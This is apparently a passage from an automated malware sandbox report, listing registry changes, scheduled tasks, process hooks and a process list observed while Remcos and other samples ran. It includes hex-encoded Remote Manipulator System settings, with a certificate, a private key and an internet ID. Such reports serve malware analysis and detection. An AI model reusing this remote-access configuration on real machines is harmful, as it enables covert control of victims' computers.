| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\System32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\TektonIT | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\Certificates = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c636572746966696374655f73657474696e67732076657273696f6e3d223730313230223e3c63657274696669636174653e4c5330744c5331435255644a5469424452564a5553555a4a51304655525330744c533074436b314a5355524b616b4e44515763325a30463353554a425a306c465154553554323936515535435a32747861477470527a6c334d454a4255584e4751555243566b31526333644455566c45566c465252305633536c594b5658704661553144515564424d56564651326433576c5674566e52694d314a735355557861474a746248646b5633686f5a45633565556c47546a566a4d314a73596c524661553144515564424d565646515864335767705662565a30596a4e5362456c464d576869625778335a466434614752484f586c4a526b3431597a4e5362474a5551575647647a423554577042654531715658684f524646345456526159555a334d48704e616b4634436b31715458684f52464634545652615955314756586844656b464b516d644f566b4a425756524262465a5554564e4a64306c42575552575556464c52454a73553170584d585a6b5231566e5646644764574659516a454b596b64474d47497a535764564d3278365a456457644531545358644a51566c45566c46525245524362464e61567a46325a4564565a315258526e566857454978596b64474d47497a535764564d3278365a4564576441704e53556c4353577042546b4a6e6133466f61326c484f586377516b465252555a4251553944515645345155314a53554a445a3074445156464651585a584e554a6e4d556b344f465246614374794e30644465576b7a436a6772526e6c6b6554565255554a56623349314e57705363455a7a55476c48654845354d6d3433626b6f3263545a36596d5a7852575269615770475347314d6347597a596d5a4a62486778566d5a43646c644e5254494b54475532617a426963303174546c5a525a32524361316f3152576435545568365658524a656e70554d6c6c4e5a584a315346426959584234596e4649646b7376566b4a4255485a685a6d3177525856315a6c41724c776f7a595870574e6a644952586f764e6b31495a6a685954474a484d57744e4d6e64785553744b5232745156586f3359577055554646484e6d687353564e76576a645a4d6d4e36516a4e465a697477515452784e6b744b436a5a35627a63316547743151793959537a567961573975645568585655524f4e6d4a5362545a794f484d334e7a644c516b73726557355262316c454e537469647a557264564231616d35564d556454626c6f316155554b4d6b6c76554441796247704964557055556b396e4e6b6f7664474e485157784a593352546130777865453146654746514d6c68444f484130645770494f44553555307874626a5257536d523152584579644468716141707655556c4551564642516b31424d4564445533464855306c694d30525252554a44643156425154524a516b465251554a546545303064555251654642336355637964537435546c6f3265584a585132553157564d31436d5a745a4846564d797430636d3573626e7058526d5176566d5a6d4f446b3354464650645531515154564264564e58596b686a4f5564506555685456464e4e4c3239544d334d775247524652697449656b78784d456f4b5457706a5356644c546d6c4e6333566a4d33704e52466c3259325a714d4578755556704c556d6b77546d3559596e424c63564d35626b466a59556c784d445245636e527061305a7a4d464d324c334d78546b52595a4170336431465065537456615568574d466f764e7a644e53585a7654335a304e6b395a4e31463652546c5a554452464d6b467a5a585a4463797476545556685446686d5632553355466c464d3234785169397a63545643436b316e64557079555568454e6d4e52616b74545a44466154326c764d31706f4e6c4a47556b70355a4535434e79396e4e6a6c68616c6c6c5a485a7965567071646d4e7264315a344e47356c55546b724b304d305a48554b65574e745957565463584e6a627a4a45564570465647646953304972576e4e71553074584d47396f516a5a6a636b683351337035535764525646687a646a56535648704264456c5a5432514b4c5330744c533146546b51675130565356456c4753554e42564555744c5330744c516f3d3c2f63657274696669636174653e3c707269766174655f6b65793e4c5330744c5331435255644a54694251556b6c575156524649457446575330744c533074436b314a535556325a306c4351555242546b4a6e6133466f61326c484f586377516b465252555a4251564e44516b746e6432646e553274425a3056425157394a516b4652517a6c696130644556577036654531545344594b646e4e5a5445744d5a6e6f3057456f7a5447784351555a5461585a7562553548613164334b306c695233497a59575a3159323578636e4a4f64437476556a4631533031565a566c316243396b644468705745685756676f34527a6c5a6431525a6444647856464a3164336c5a4d565a44516a4248556d35725530524a64325a4f557a427155453551576d64344e6e5530597a6c30635735476457396c4f484935565556424b7a6c774b324672436c4d324e5467764e79396b636b3559636e4e6a564641766233646b4c33686a64484e6956314636596b4e775244527259564535564642306355354e4f554669635564566145746f626e5271576e704e53474e534c7a594b61305270636d3976626e4a4c616e5a7552314d3054446c6a636d313153326c6c4e4752615555307a63485248596e463265587032646e4e76525849335332524461476451626a5632524734324e43733254325255565170615332527562556c5557576c6e4c3152685630316c4e47784f52545a45623234724d58645a5131566f6554464c55585a5952586455526d3876576d4e4d655735704e6b316d656d3478535856685a6d685662444930436c4e7959544e355430646f5157644e516b464252554e6e5a305642576a526c597a4277544752794f486777616a68424e45744f4d4731515232395a656e6f315233466b4f5731716556517a61564a6d644731794f54634b61465236644770526356464f54575654576e524556474a31546d7868525764544e6c704661314275624752324e486868636e4178595746536432316f52306842596e4934567a6832646d4e43513170365647395851676f305469387857546c54623063315156566b4d48644d52556c7a596d686953314e46646c5934556b39475154427a576e6c4b54334932516a684f64316834533168545244524e5a32784363574e4b56464a6a54553975436e46774e455a5662554a535a4570715254465851575a6e4e477877643341784f57677852464e554e5574725130647257577856614652484b304a51624551765458523262475648596d564e536b566f55576332576b514b4e445a6a5a474a306245354d526a686f537a46316230686e616d314b5a6b785559575233547a5677616a46694e32566f4e316b786247356a5132467452554a344c3370714d307044596e565253336c485646646c62776f3261326c6a52564d7a546b493161454933656c4979536e4578626c646d4d6e4e6c636d4933526c6c5257554e50596d3944543364534e46464c516d6452524452344d31637662484a564c7a46535969383251316451436a42705a6939694d305a56526e64505a6b6471517a4a6f524870594e6b393054454e6f64486c7753474673546e4248613052764e48527261307047595670324d6c5271536c6450566a424e62473535634464685531634b4b3159764e6c4a324e6a4a554e6e42705a45743363484179626d686a5347466d55327833596c4a42646d64584e446c595257773265554e694b3267785630457755465977656d35765130737964486b336348526d5551706961566f785a6b4e4f6556703454335a734d566c4c566a5a6f616d343351556447555574435a314645517a646a4f545a54626a6378613368756457647853474e4d516e493462456c6d53484a56533256456432777a436d5a6c64324a6e4c3055774c306454576d746c546c52475333646b4e5868424d56646a5245786f5a45464861445a724d336c315a6c5630576a6734643277334d327872626d317a4d325972554645344f5739736358554b525842724b323171566e686b6154463354446c7a4e6d39785a555a4c5455706e654574705533565064456452556d52725a6c45724b304e5662586b7265577458566a526d4f45313254476c49526e6453626c6c5061676f72614851796379394d4f46685253304a6e555551775956424756484e79635573315933706a65574a5164466c7061553574567a426961326c7063584a4e4e576b305a6c427a623368615679744c4d464e7862565630436a463661584673645739364f54466b535668765458524d6345686f61554e5956574e6f6433703661474d765a7974334e55354963565a7561484a724f444d345758685554553974636b525164575a34574768556158514b6556466151556c32623070784b7a5279524770705a6a4a6f5233637a64544a745a6c684e5532394e4d6e6c4b61565972613356464e464e6d516d4a5052455135634552554e4374354b336c4c555574435a30686e6351706f5247356c564530764d445642635535354d58686e59304d314c30686e61336851556a4257536d5976593367334d3246764f484a4955564272547a4d7a56334a444f46425156334e5857544172634770556253744a436b6442516b5976535459335a6b5251534731355745564b4d454e78533068484e57744961585268626e526d51324e304d6a5236566c51315a3151764e6a5256526b6476536c524e65577058593368726230644362314d4b54456478546c5671555652764e314a4d59335a51544374424b7a5247546c526f53307836554642765645743256444533516a4e4e5a45467652304a4253544a35614645725547464a616a64685a6e684855586836564170305555566156316c6e62537379536974545369394864464a796132643153465a4a61326c6e4e4546566353733361574636636e646f624778705a6c6c68566d31346443747059554a4f55476332556d786856566330436b6831554770435a5552745445566a5745396153585a4c6132396d6158527752484a78556e5133625642764e304a4c62554e5664557051644756734d32733053554e4b596d683665564a496345356853555a706448454b566a42326545705a62454e4263574533626b78726147564c51585a4752575a31436930744c533074525535454946425353565a42564555675330565a4c5330744c53304b3c2f707269766174655f6b65793e3c2f636572746966696374655f73657474696e67733e0d0a | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\InternetId = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e7465726e65745f69645f73657474696e67732076657273696f6e3d223730313230223e3c696e7465726e65745f69643e3434302d3537332d3235302d3639343c2f696e7465726e65745f69643e3c7573655f696e65745f636f6e6e656374696f6e3e747275653c2f7573655f696e65745f636f6e6e656374696f6e3e3c696e65745f7365727665723e3c2f696e65745f7365727665723e3c7573655f637573746f6d5f696e65745f7365727665723e66616c73653c2f7573655f637573746f6d5f696e65745f7365727665723e3c696e65745f69645f706f72743e353635353c2f696e65745f69645f706f72743e3c7573655f696e65745f69645f697076363e66616c73653c2f7573655f696e65745f69645f697076363e3c696e65745f69645f7573655f70696e3e66616c73653c2f696e65745f69645f7573655f70696e3e3c696e65745f69645f70696e3e3c2f696e65745f69645f70696e3e3c2f726d735f696e7465726e65745f69645f73657474696e67733e0d0a | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Remcos\remcos.exe | N/A |
| N/A | N/A | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Windows\System32\dllhost.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
